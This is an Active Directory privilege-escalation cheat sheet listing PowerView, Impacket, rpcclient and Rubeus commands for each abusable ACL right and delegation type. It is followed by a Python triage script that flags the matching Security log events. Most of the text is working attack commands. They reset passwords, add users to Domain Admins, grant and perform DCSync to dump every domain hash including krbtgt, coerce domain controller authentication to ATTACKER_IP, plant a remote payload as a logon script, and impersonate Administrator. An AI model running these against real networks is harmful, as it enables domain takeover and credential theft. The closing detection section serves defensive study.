
GenericAll

Reset the target user's password.
Set-DomainUserPassword -Identity TARGET -AccountPassword (ConvertTo-SecureString 'NewP@ss123' -AsPlainText -Force)
rpcclient -U "DOMAIN/USER%Password" DC01 -c "setuserinfo2 TARGET 23 'NewP@ss123'"
Add the target user to Domain Admins.
Add-DomainGroupMember -Identity 'Domain Admins' -Members TARGET
net rpc group addmem "Domain Admins" "TARGET" -U "DOMAIN/USER%Password" -S DC01

ForceChangePassword

Set-DomainUserPassword -Identity TARGET -AccountPassword (ConvertTo-SecureString 'NewP@ss123' -AsPlainText -Force)
rpcclient -U "DOMAIN/USER%Password" DC01 -c "setuserinfo2 TARGET 23 'NewP@ss123'"
impacket-changepasswd 'DOMAIN/ATTACKER:Password@DC01' -newpass 'NewP@ss123' -altuser TARGET -altdomain DOMAIN

AddMember

Add-DomainGroupMember -Identity 'Domain Admins' -Members TARGET
net rpc group addmem "Domain Admins" "TARGET" -U "DOMAIN/USER%Password" -S DC01

GenericWrite

Write an SPN to the target so it can be Kerberoasted.
Set-DomainObject -Identity TARGET -Set @{serviceprincipalname='nonexistent/BLAH'}
impacket-addspn -u 'DOMAIN\ATTACKER' -p 'Password' -s 'nonexistent/BLAH' -t 'TARGET' DC01
Abuse the logon script path for code execution.
Set-DomainObject -Identity TARGET -Set @{scriptpath='\\ATTACKER_IP\share\payload.ps1'}

WriteDACL

Grant DCSync rights to the controlled user.
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity ATTACKER -Rights DCSync
Grant full control over a target object.
Add-DomainObjectAcl -TargetIdentity TARGET -PrincipalIdentity ATTACKER -Rights All

WriteOwner

Take ownership then grant full control.
Set-DomainObjectOwner -Identity TARGET -OwnerIdentity ATTACKER
Add-DomainObjectAcl -TargetIdentity TARGET -PrincipalIdentity ATTACKER -Rights All

AllExtendedRights

Reset the target's password.
Set-DomainUserPassword -Identity TARGET -AccountPassword (ConvertTo-SecureString 'NewP@ss123' -AsPlainText -Force)
Add SPN for Kerberoasting.
Set-DomainObject -Identity TARGET -Set @{serviceprincipalname='fake/spn'}
Get-DomainSPNTicket -SPN 'fake/spn' | ConvertTo-Hashcat

DCSync (GetChanges + GetChangesAll)

Dump all domain hashes.
impacket-secretsdump 'DOMAIN/USER:Password@DC01'
Dump only NTLM hashes.
impacket-secretsdump 'DOMAIN/USER:Password@DC01' -just-dc-ntlm
Dump a specific user.
impacket-secretsdump 'DOMAIN/USER:Password@DC01' -just-dc-user krbtgt
Pass-the-Hash variant.
impacket-secretsdump 'DOMAIN/USER@DC01' -hashes LMHASH:NTHASH -just-dc-ntlm

Unconstrained Delegation

Monitor for incoming TGTs (run on compromised host with unconstrained delegation).
.\Rubeus.exe monitor /interval:5 /nowrap
Trigger DC authentication via PrinterBug.
impacket-printerbug 'DOMAIN/USER:Password@DC01' ATTACKER_IP
Trigger DC authentication via PetitPotam (unauthenticated).
impacket-petitpotam ATTACKER_IP DC01
Extract captured TGT and pass it.
.\Rubeus.exe ptt /ticket:<base64>

Constrained Delegation (S4U2Proxy)

Impersonate a Domain Admin to the target service.
.\Rubeus.exe s4u /user:SVC_ACCOUNT /rc4:NTHASH /impersonateuser:Administrator /msdsspn:cifs/DC01.domain.local /ptt
impacket-getST -spn 'cifs/DC01.domain.local' -impersonate Administrator 'DOMAIN/SVC_ACCOUNT' -hashes LMHASH:NTHASH
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass 'DOMAIN/[email protected]'

Resource-Based Constrained Delegation (RBCD)

Add attacker-controlled computer to target’s msDS-AllowedToActOnBehalfOfOtherIdentity.
Set-DomainRBCD -Identity TARGET_COMPUTER -DelegateFrom ATTACKER_COMPUTER
impacket-rbcd -f ATTACKER_COMPUTER -t TARGET_COMPUTER -dc-ip DC01 'DOMAIN/USER:Password'
Impersonate Administrator.
impacket-getST -spn 'cifs/TARGET_COMPUTER.domain.local' -impersonate Administrator 'DOMAIN/ATTACKER_COMPUTER$' -hashes LMHASH:NTHASH
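Each primitive above leaves a distinct trace in the Security log (4724 for the password resets, 4728/4732/4756 for the group additions, 5136 for the SPN, scriptPath and RBCD attribute writes, 4662 with the replication GUIDs for DCSync). The triage below is an added example, not code from the original page; it assumes events already flattened to JSON with field names matching the EVTX data names, and the sample records are constructed.

```python
"""Triage Windows Security events for the ACL-abuse primitives above.
Added example, not from the original page. Records are constructed JSON
stand-ins for EVTX fields (EventID, SubjectUserName, TargetUserName,
MemberName, AttributeLDAPDisplayName, ObjectDN, Properties)."""
import json

# Control-access right GUIDs exercised by DCSync (well-known schema values).
DCSYNC_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
# Attributes written by the GenericWrite and RBCD primitives.
WATCHED_ATTRS = {"servicePrincipalName", "scriptPath",
                 "msDS-AllowedToActOnBehalfOfOtherIdentity"}
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}
REPLICATION_ALLOWLIST = set()  # non-DC accounts expected to replicate, e.g. AAD Connect

def classify(ev):
    """Return an alert string for one event dict, or None if it looks benign."""
    eid, actor = ev.get("EventID"), ev.get("SubjectUserName", "")
    if eid == 4724:  # password reset (GenericAll / ForceChangePassword)
        return f"password reset of {ev['TargetUserName']} by {actor}"
    if eid in (4728, 4732, 4756) and ev.get("TargetUserName") in PRIVILEGED_GROUPS:
        return f"{ev['MemberName']} added to {ev['TargetUserName']} by {actor}"
    if eid == 5136 and ev.get("AttributeLDAPDisplayName") in WATCHED_ATTRS:
        return f"{ev['AttributeLDAPDisplayName']} written on {ev['ObjectDN']} by {actor}"
    if eid == 4662 and DCSYNC_RIGHTS & set(ev.get("Properties", [])):
        # DCs (accounts ending in '$') replicate legitimately; anyone else is suspect.
        if not actor.endswith("$") and actor not in REPLICATION_ALLOWLIST:
            return f"replication rights used by non-DC account {actor} (DCSync)"
    return None

def triage(json_lines):
    """Run classify() over newline-delimited JSON events and return the alerts."""
    return [a for a in (classify(json.loads(line)) for line in json_lines) if a]

# Constructed sample: three abuses, one benign DC replication, one benign attribute write.
SAMPLE = [
    '{"EventID": 4724, "SubjectUserName": "jdoe", "TargetUserName": "svc_backup"}',
    '{"EventID": 4662, "SubjectUserName": "DC01$", "Properties": ["1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]}',
    '{"EventID": 4662, "SubjectUserName": "jdoe", "Properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"]}',
    '{"EventID": 5136, "SubjectUserName": "jdoe", "AttributeLDAPDisplayName": "description", "ObjectDN": "CN=svc_backup,CN=Users,DC=domain,DC=local"}',
    '{"EventID": 5136, "SubjectUserName": "jdoe", "AttributeLDAPDisplayName": "servicePrincipalName", "ObjectDN": "CN=svc_backup,CN=Users,DC=domain,DC=local"}',
]

if __name__ == "__main__":
    for alert in triage(SAMPLE):
        print(alert)
```

Auditing 5136 requires a SACL on the monitored objects and the "Audit Directory Service Changes" subcategory enabled; 4662 likewise needs "Audit Directory Service Access" and a SACL on the domain object.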
